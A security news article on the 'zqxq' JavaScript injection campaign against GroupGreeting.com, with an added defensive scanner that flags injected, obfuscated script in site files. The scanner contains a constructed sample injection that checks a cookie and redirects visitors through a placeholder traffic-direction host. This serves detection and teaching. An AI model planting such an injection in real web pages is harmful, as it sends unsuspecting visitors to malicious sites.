The popular e-card platform GroupGreeting.com, used by major companies such as Airbnb, Coca-Cola, and eBay, recently fell victim to a widespread cyberattack known as the “zqxq” campaign. This malicious campaign, which mirrors tactics from the NDSW/NDSX and TDS Parrot attacks, targeted thousands of websites using sophisticated JavaScript injection techniques. The attack was discovered by ThreatDown, powered by Malwarebytes, as part of their ongoing monitoring of large-scale cyber threats.
At its core, the “zqxq” campaign uses obfuscated JavaScript to infiltrate high-traffic websites, particularly those experiencing seasonal spikes in activity. According to Stefan Dasic, manager of research and response for ThreatDown, “The seasonal increase in user interactions with greeting card sites provides ample opportunities for cybercriminals to quietly inject malware and target unsuspecting visitors.”
Key Features of the Attack:
- Obfuscated Code: The injected script is appended to otherwise legitimate site files and uses scrambled variable names together with custom helper functions named HttpClient, rand, and token. The scrambling defeats simple signature matching and slows manual analysis by researchers.
- Traffic Direction Systems (TDS): After checking visitor properties, such as cookies already set in the browser, the script redirects the visitor to exploit kits, phishing sites, or servers delivering additional malware payloads.
- Massive Scale: Over 2,800 websites have been compromised using similar tactics, typically through vulnerable or outdated installations of WordPress, Joomla, and Magento and their plugins.
Cybercriminals selected GroupGreeting for its high-profile nature and its reputation as a trusted platform. With over 25,000 workplace clients and significant seasonal traffic during events like holidays and birthdays, GroupGreeting was an ideal entry point for malware distribution. As Dasic noted, “Visitors are more inclined to trust links from a service they deem reputable”.
Potential Impact:
- User Redirects: Victims’ browsers are sent to malicious domains hosting phishing pages or information-stealing malware.
- Persistence Mechanisms: Because the injection is planted in several files at once, removing a single infected file leaves the remaining copies to reinfect the site.
- Secondary Payloads: From credential theft to ransomware, attackers leverage the trust users place in GroupGreeting to deliver damaging follow-on attacks.
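The scanner below is an added example written for this page; it is not code from the article or from ThreatDown/Malwarebytes. It turns the indicators described under Key Features (custom functions named HttpClient, rand, and token; hex-escaped strings; a cookie check gating a redirect) into a scored heuristic, runs it over constructed sample files, and reports every file carrying the injection, which is the point made under Potential Impact about reinfection from copies left behind. All weights, thresholds, regular expressions, file paths, and sample contents are assumptions, not published indicators of compromise.

```javascript
// Added example for this page. Heuristic scanner for injected, obfuscated JavaScript of
// the kind the article describes. Indicator names, weights and the threshold are assumed.

// Each indicator is a regex test over the file text plus a weight. Hypothetical values.
const INDICATORS = [
  { name: 'function HttpClient', weight: 2,
    test: s => /\bfunction\s+HttpClient\b|\bHttpClient\s*=\s*function\b/.test(s) },
  { name: 'function rand', weight: 2,
    test: s => /\bfunction\s+rand\b|\brand\s*=\s*function\b/.test(s) },
  { name: 'function token', weight: 2,
    test: s => /\bfunction\s+token\b|\btoken\s*=\s*function\b/.test(s) },
  { name: '10+ hex escapes', weight: 2,
    test: s => (s.match(/\\x[0-9a-fA-F]{2}/g) || []).length >= 10 },
  { name: 'dynamic code execution', weight: 1,
    test: s => /\beval\s*\(|\batob\s*\(|String\.fromCharCode|\bunescape\s*\(/.test(s) },
  { name: 'cookie check', weight: 1,
    test: s => /document(?:\.cookie|\[['"]cookie['"]\])/.test(s) },
  { name: 'redirect sink', weight: 1,
    test: s => /location(?:\.href|\.replace|\[['"]href['"]\])|window(?:\.location|\[['"]location['"]\])/.test(s) },
];
// Assumed threshold: a consent banner (cookie + reload) scores 2 and stays well below it.
const FLAG_THRESHOLD = 5;

// Score one file's text; returns the matched indicator names and the verdict.
function scanText(text) {
  const matched = INDICATORS.filter(ind => ind.test(text));
  const score = matched.reduce((sum, ind) => sum + ind.weight, 0);
  return { score, hits: matched.map(ind => ind.name), flagged: score >= FLAG_THRESHOLD };
}

// Scan a map of { relativePath: fileText } and return every flagged file, so the
// responder sees all copies of the injection rather than cleaning the first one found.
function scanSite(files) {
  return Object.entries(files)
    .map(([file, text]) => ({ file, ...scanText(text) }))
    .filter(r => r.flagged);
}

// Walk a web root on disk and scan every file with a listed extension.
function scanDirectory(root, exts = ['.js', '.php', '.html', '.htm']) {
  const fs = require('fs');
  const path = require('path');
  const files = {};
  const walk = dir => {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      const full = path.join(dir, entry.name);
      if (entry.isDirectory()) walk(full);
      else if (exts.includes(path.extname(entry.name).toLowerCase())) {
        files[path.relative(root, full)] = fs.readFileSync(full, 'utf8');
      }
    }
  };
  walk(root);
  return scanSite(files);
}

// Constructed sample injection (not from any real site). It only mimics the shape the
// article describes: named helpers, hex-escaped strings, a cookie gate, then a redirect
// to a placeholder domain. It is inert text here and is never executed.
const INJECTION = [
  ";(function(){function HttpClient(){this['get']=function(a,c){var d=new XMLHttpRequest();",
  "d['onreadystatechange']=function(){if(d['readyState']==4&&d['status']==200)c(d['responseText'])};",
  "d['open']('\\x47\\x45\\x54',a,true);d['send']()}}",
  "function rand(){return Math['random']()['toString'](36)['substr'](2,10)}",
  "function token(){return rand()+rand()}",
  "if(document['cookie']['indexOf']('\\x5f\\x74\\x64\\x73')==-1){document['cookie']='\\x5f\\x74\\x64\\x73\\x3d\\x31';",
  "new HttpClient()['get']('https://tds.example.invalid/?t='+token(),function(r){window['location']=r})}})();",
].join('');

// Constructed site snapshot: one benign file that touches cookies and location, and the
// same injection appended to two different files, as the article's persistence point warns.
const SAMPLE_FILES = {
  'assets/consent.js': [
    "function showBanner(){",
    "  if (document.cookie.indexOf('consent=1') === -1) document.getElementById('banner').style.display = 'block';",
    "}",
    "function acceptConsent(){ document.cookie = 'consent=1; path=/'; window.location.reload(); }",
  ].join('\n'),
  'wp-content/themes/site/js/main.js':
    "function initMenu(){ document.querySelector('.menu').classList.add('ready'); }\n" + INJECTION,
  'wp-includes/js/jquery/jquery.min.js':
    "/* jQuery (stand-in for the real library) */\n" + INJECTION,
};

if (typeof require !== 'undefined' && require.main === module) {
  // node scanner.js [webroot]  -- without an argument, scans the constructed samples.
  const results = process.argv[2] ? scanDirectory(process.argv[2]) : scanSite(SAMPLE_FILES);
  for (const r of results) console.log(`${r.file}: score ${r.score} [${r.hits.join(', ')}]`);
}
```

Against the samples the consent banner scores 2 and is ignored, while both files carrying the injection score 10 and are listed together. On a real site expect noise from legitimately minified libraries, which also contain hex escapes, so compare each flagged file against a known-good copy from version control or the vendor package before deleting anything, and clean every flagged file in the same pass.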
The “zqxq” campaign shares notable similarities with the NDSW/NDSX and TDS Parrot JavaScript threats. Both involve deeply obfuscated code, automated infection of thousands of websites, and redirection to malicious domains. According to data from Sucuri and Unit 42, these campaigns collectively accounted for over 43,000 detections in 2024 alone.
The attack on GroupGreeting demonstrates how cybercriminals exploit trusted platforms to reach a wider audience, particularly during periods of high activity. As Dasic aptly put it, “Even ‘safe’ or well-known websites can be hijacked”. With the scale and sophistication of these campaigns growing, organizations must prioritize both prevention and rapid response to safeguard users from such pervasive threats. In practice that means keeping CMS cores and plugins patched, monitoring site files for unexpected appended JavaScript, and, during cleanup, removing every copy of the injection rather than only the first one found.